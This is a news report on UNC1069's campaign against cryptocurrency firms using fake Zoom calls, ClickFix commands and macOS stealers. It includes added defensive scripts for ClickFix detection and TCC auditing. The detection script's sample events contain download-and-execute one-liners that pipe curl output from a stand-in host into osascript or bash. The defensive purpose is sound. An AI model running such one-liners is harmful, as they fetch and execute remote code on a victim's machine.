North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations

News Room, published 11 February 2026 (last updated 2026/02/11 at 2:38 AM)

The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft.

“The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim,” Google Mandiant researchers Ross Inman and Adrian Hernandez said.

UNC1069, assessed to be active since at least April 2018, has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram. It’s also tracked by the broader cybersecurity community under the monikers CryptoCore and MASAN.

In a report published last November, Google Threat Intelligence Group (GTIG) pointed out the threat actor’s use of generative artificial intelligence (AI) tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of efforts to support its social engineering campaigns.

The group has also been observed attempting to misuse Gemini to develop code to steal cryptocurrency, as well as leveraging deepfake images and video lures mimicking individuals in the cryptocurrency industry in campaigns that distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK).

“Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds,” Google said.

In the latest intrusion documented by the tech giant’s threat intelligence division, UNC1069 is said to have deployed as many as seven unique malware families, including several new ones such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH.

The attack begins when the threat actor approaches the victim on Telegram, impersonating venture capitalists and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with the target.

The meeting link is designed to redirect the victim to a fake website masquerading as Zoom (“zoom.uswe05[.]us”). In certain cases, the meeting links are directly shared via messages on Telegram, often using Telegram’s hyperlink feature to hide the phishing URLs.

Regardless of the method used, as soon as the victim clicks the link, they are presented with a fake video call interface that mirrors Zoom, urging them to enable their camera and enter their name. Once the target joins the meeting, they are shown a screen that resembles an actual Zoom meeting.

The videos in these calls are suspected to be either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the same scheme. It’s worth noting that Kaspersky is tracking the same campaign under the name GhostCall, which it documented in detail in October 2025.

“Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call,” the Russian security vendor noted at the time. “When the video replay ended, the page smoothly transitioned to showing that user’s profile image, maintaining the illusion of a live call.”

The attack proceeds to the next phase when the victim is shown a bogus error message about a purported audio issue, after which they are prompted to download and run a ClickFix-style troubleshooting command to address the problem. In the case of macOS, the commands lead to the delivery of an AppleScript that, in turn, drops a malicious Mach-O binary on the system.
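The ClickFix step described above relies on the victim pasting a "troubleshooting" command into a terminal, which then fetches and runs a script in one line. The following detection heuristic is an added example, not code from the original article or from Mandiant; it scans constructed, EDR-style process-execution events (the JSON field names `parent`, `exe` and `cmdline` and the sample hostnames are assumptions) and flags commands launched from an interactive terminal that pipe or substitute a network download straight into an interpreter such as `osascript`.

```python
import json
import re

# Constructed sample events (not real telemetry). Field names are an assumption:
# a generic EDR export with the parent process name, executable and full command line.
SAMPLE_EVENTS = [
    '{"parent": "Terminal", "exe": "/bin/zsh", "cmdline": "ls -la"}',
    '{"parent": "Terminal", "exe": "/bin/zsh", "cmdline": "curl -fsSL https://zoom-fix.invalid/audio.scpt | osascript"}',
    '{"parent": "Terminal", "exe": "/bin/zsh", "cmdline": "osascript -e beep"}',
    '{"parent": "Finder", "exe": "/usr/bin/osascript", "cmdline": "osascript /Users/alice/scripts/backup.scpt"}',
    '{"parent": "Terminal", "exe": "/bin/bash", "cmdline": "bash -c \\"$(curl -s https://zoom-fix.invalid/fix.sh)\\""}',
]

# Parents that indicate a human typed or pasted the command.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}
# A network fetch feeding an interpreter in the same command line is the
# hallmark of a pasted "fix" command; the lists are deliberately short.
FETCH = re.compile(r"\b(curl|wget)\b")
EXEC_SINK = re.compile(r"\b(osascript|bash|sh|zsh|python3?)\b")


def is_clickfix_like(event):
    """True when an interactive shell runs a download-and-execute one-liner."""
    if event.get("parent") not in INTERACTIVE_PARENTS:
        return False
    cmd = event.get("cmdline", "")
    if not FETCH.search(cmd):
        return False
    # The fetched content must reach an interpreter: via a pipe or command substitution.
    chained = "|" in cmd or "$(" in cmd
    return chained and EXEC_SINK.search(cmd) is not None


def scan(lines):
    """Return the command lines of all events matching the heuristic."""
    hits = []
    for line in lines:
        event = json.loads(line)
        if is_clickfix_like(event):
            hits.append(event["cmdline"])
    return hits


if __name__ == "__main__":
    for cmd in scan(SAMPLE_EVENTS):
        print("suspicious download-and-execute from terminal:", cmd)
```

Run against the sample, the scanner reports the two one-liners that pipe or substitute a `curl` download into `osascript` or `bash`; the plain `osascript -e beep` and the Finder-launched script are ignored. In production the allow-listed parents and interpreter names would be tuned to the fleet, and a hit should be correlated with a subsequent unsigned Mach-O write, which is the next step the article describes.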

Called WAVESHAPER, the malicious C++ executable is designed to gather system information and deliver a Go-based downloader codenamed HYPERCALL, which is then used to serve additional payloads:

  • A follow-on Golang backdoor component known as HIDDENCALL, which provides hands-on-keyboard access to the compromised system and deploys a Swift-based data miner called DEEPBREATH.
  • A second C++ downloader called SUGARLOADER, which is used to deploy CHROMEPUSH.
  • A minimalist C/C++ backdoor referred to as SILENCELIFT, which sends system information to a command-and-control (C2) server.

DEEPBREATH is equipped to manipulate macOS’s Transparency, Consent, and Control (TCC) database to gain file system access, enabling it to steal iCloud Keychain credentials as well as data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes application.
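Because TCC grants are stored in a SQLite database, an unexpected Full Disk Access entry is something a defender can audit. The script below is an added example, not code from the article or from any vendor mentioned in it: it models a reduced subset of the `access` table in TCC.db (an assumption; the real table has more columns, and the `auth_value` meaning of 2 = allowed applies to macOS 11 and later), loads constructed rows, and reports sensitive grants held by clients that are not on an allow-list or that are identified by a bare file path rather than a bundle identifier.

```python
import sqlite3

# Reduced model of the TCC.db `access` table (assumption: only the columns this
# audit needs are reproduced; real databases carry more).
TCC_SCHEMA = """
CREATE TABLE access (
    service       TEXT    NOT NULL,
    client        TEXT    NOT NULL,
    client_type   INTEGER NOT NULL,   -- 0 = bundle identifier, 1 = absolute path
    auth_value    INTEGER NOT NULL,   -- 0 = denied, 2 = allowed (macOS 11+)
    auth_reason   INTEGER NOT NULL,
    last_modified INTEGER NOT NULL
);
"""

# Constructed sample rows (not from a real system). The third row is the kind of
# entry a stealer would need: Full Disk Access granted to an unsigned, path-based
# binary hidden in a cache directory.
SAMPLE_ROWS = [
    ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 4, 1738000000),
    ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 4, 1738100000),
    ("kTCCServiceSystemPolicyAllFiles", "/Users/alice/Library/Caches/.zoom_helper", 1, 2, 4, 1739000000),
    ("kTCCServiceSystemPolicyAllFiles", "/usr/local/bin/legit-backup", 1, 0, 4, 1737000000),
]

# Services whose grant gives broad access to user data, screen or input.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",  # Full Disk Access
    "kTCCServiceAccessibility",
    "kTCCServiceScreenCapture",
}
AUTH_ALLOWED = 2


def load_sample_db():
    """Build an in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(TCC_SCHEMA)
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def audit_tcc(conn, allowlist):
    """Return (service, client, reason) for sensitive grants that need review."""
    findings = []
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value FROM access")
    for service, client, client_type, auth_value in rows:
        if service not in SENSITIVE_SERVICES or auth_value != AUTH_ALLOWED:
            continue
        if client in allowlist:
            continue
        reason = "path-based client" if client_type == 1 else "not on allow-list"
        findings.append((service, client, reason))
    return findings


def audit_file(path, allowlist):
    """Audit a real TCC.db read-only (requires Full Disk Access to open it)."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return audit_tcc(conn, allowlist)
    finally:
        conn.close()


if __name__ == "__main__":
    for finding in audit_tcc(load_sample_db(), {"com.apple.Terminal"}):
        print("review TCC grant:", finding)
```

On the sample data only the hidden `.zoom_helper` binary is reported: Terminal is allow-listed, the Zoom camera grant is not a sensitive service, and the `legit-backup` row is denied rather than allowed. On a live host, `audit_file` would be pointed at the per-user database under `~/Library/Application Support/com.apple.TCC/TCC.db` and the system one under `/Library/Application Support/com.apple.TCC/TCC.db`; a grant that was written directly rather than through the system prompt is worth comparing against the host's `last_modified` timeline.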

Like DEEPBREATH, CHROMEPUSH also acts as a data stealer, but it’s written in C++ and is deployed as a browser extension to Google Chrome and Brave by masquerading as a tool for editing Google Docs offline. It also comes with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.

“The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft,” Mandiant said. “While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities.”
